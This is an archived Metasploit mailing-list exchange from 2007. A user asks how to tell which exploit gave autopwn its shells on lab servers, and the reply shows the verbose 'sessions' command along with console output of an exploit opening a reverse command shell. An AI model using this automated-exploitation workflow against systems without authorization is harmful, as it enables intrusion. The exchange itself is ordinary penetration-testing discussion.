[framework] Autopwn question
mmiller at hick.org
mmiller at hick.org
Thu Jan 4 02:35:04 CST 2007
We added support a while back to the 'sessions' command for just this
reason. Just specify the '-v' (verbose) parameter along with sessions
-l as shown below:
msff exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 211 byte payload...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (10.33.7.2:4444 -> 10.33.7.5:4731)
[*] Session 1 created in the background.
msf exploit(aggressive) > sessions -l -v
Active sessions
===============
Id Description Tunnel Via
-- ----------- ------ ---
1 Command shell 10.33.7.2:4444 -> 10.33.7.5:4731 test/aggressive
On Thu, Jan 04, 2007 at 08:04:00AM +0100, L.vd.Eijk at mindef.nl wrote:
> Hi list !
> First off all, a good 2007
> Regarding the autopwn script. Testing in my lab was great fun with this
> nifty little script. The blog entry from HD with the "how-to" was
> crystal clear. But how can i find out by wich exploit some off my
> servers were hit ?
> I first run the db_nmap to fill my database with no -p option and
> straight after that the autopwn -p -t -e on the targets. Some off the
> targets got 2 to 3 bind shells on them. Sweet off course but with what
> exploits ?
>
> Cheers, L
>
> Dit bericht kan informatie bevatten die niet voor u is bestemd. Indien u niet de geadresseerde bent of dit bericht abusievelijk aan u is toegezonden, wordt u verzocht dat aan de afzender te melden en het bericht te verwijderen. De Staat aanvaardt geen aansprakelijkheid voor schade, van welke aard ook, die verband houdt met risico's verbonden aan het elektronisch verzenden van berichten.
>
> This message may contain information that is not intended for you. If you are not the addressee or if this message was sent to you by mistake, you are requested to inform the sender and delete the message. The State accepts no liability for damage of any kind resulting from the risk inherent in the electronic transmission of messages.
More information about the framework
mailing list